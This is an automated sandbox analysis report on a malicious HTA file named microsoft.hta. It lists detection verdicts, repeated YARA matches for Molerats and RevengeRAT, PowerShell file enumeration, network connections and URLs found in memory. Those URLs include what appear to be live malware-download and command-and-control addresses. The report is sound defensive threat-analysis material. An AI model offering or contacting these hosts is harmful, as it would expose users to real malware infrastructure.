Loading ...

Analysis Report microsoft.hta

Overview

General Information

Joe Sandbox Version:24.0.0 Fire Opal
Analysis ID:84810
Start date:17.10.2018
Start time:21:12:12
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:microsoft.hta
Cookbook file name:default.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.winHTA@49/18@2/3
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .hta
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://pm2bitcoin.com:5000/is-readyAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://pm2bitcoin.com:5000/is-readyvirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: microsoft.htavirustotal: Detection: 10%Perma Link
Yara signature matchShow sources
Source: 00000005.00000003.1648661343.02828000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1783978911.00808000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2097194001.043E0000.00000004.sdmp, type: MEMORYMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1660564655.0282B000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1869485454.026C8000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1774350891.00C9D000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1777449971.00CC8000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1871686478.021B5000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1650450229.00CB8000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1777322636.024E9000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1814699090.028BB000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1684455083.0071D000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1772877643.028B8000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1804762410.00809000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1870458103.021B5000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1719040637.02669000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1687366851.00748000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1668480739.00CB9000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1771537764.03221000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.1929031849.01BFC000.00000004.sdmp, type: MEMORYMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1728354835.0074A000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1682024502.03351000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1926941048.021BA000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1893158995.026CB000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1782023823.00808000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1725530094.0074A000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.1936492458.043A0000.00000004.sdmp, type: MEMORYMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2094413117.01AA0000.00000004.sdmp, type: MEMORYMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1802081353.024EC000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1648294841.034E1000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1649176861.00C8D000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1683144936.02666000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1775852566.03211000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1868087137.03221000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1803354178.00809000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1817762215.00CCA000.00000004.sdmp, type: MEMORYMatched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.1915472775.01A00000.00000004.sdmp, type: MEMORYMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.powershell.exe.43a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.powershell.exe.43e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.powershell.exe.43a0000.5.unpack, type: UNPACKEDPEMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.powershell.exe.43e0000.5.unpack, type: UNPACKEDPEMatched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.3:49169 -> 194.5.98.10:5000
Source: global trafficTCP traffic: 192.168.2.3:49174 -> 23.105.131.191:5478
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.191
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: NOBIS-TECH-NobisTechnologyGroupLLCUS NOBIS-TECH-NobisTechnologyGroupLLCUS
Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS
Found strings which match to known social media urlsShow sources
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: briargrove.org
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: wscript.exe, 00000006.00000002.2058881653.0033F000.00000004.sdmpString found in binary or memory: http://pm2bitcoin.com:5000/is-ready
Source: wscript.exe, 00000006.00000002.2058881653.0033F000.00000004.sdmpString found in binary or memory: http://pm2bitcoin.com:5000/is-readyS
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmpString found in binary or memory: https://briargrove.org
Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmpString found in binary or memory: https://briargrove.org/microsoft
Source: powershell.exe, 00000004.00000002.1644143606.003E4000.00000004.sdmp, powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp, powershell.exe, 00000004.00000002.1652412654.01BB0000.00000004.sdmp, microsoft.htaString found in binary or memory: https://briargrove.org/microsoft.vbs
Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmpString found in binary or memory: https://briargrove.org/microsoft.vbst
Source: powershell.exe, 00000004.00000002.1669040705.02123000.00000004.sdmpString found in binary or memory: https://briargrove.orgx&
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp, powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
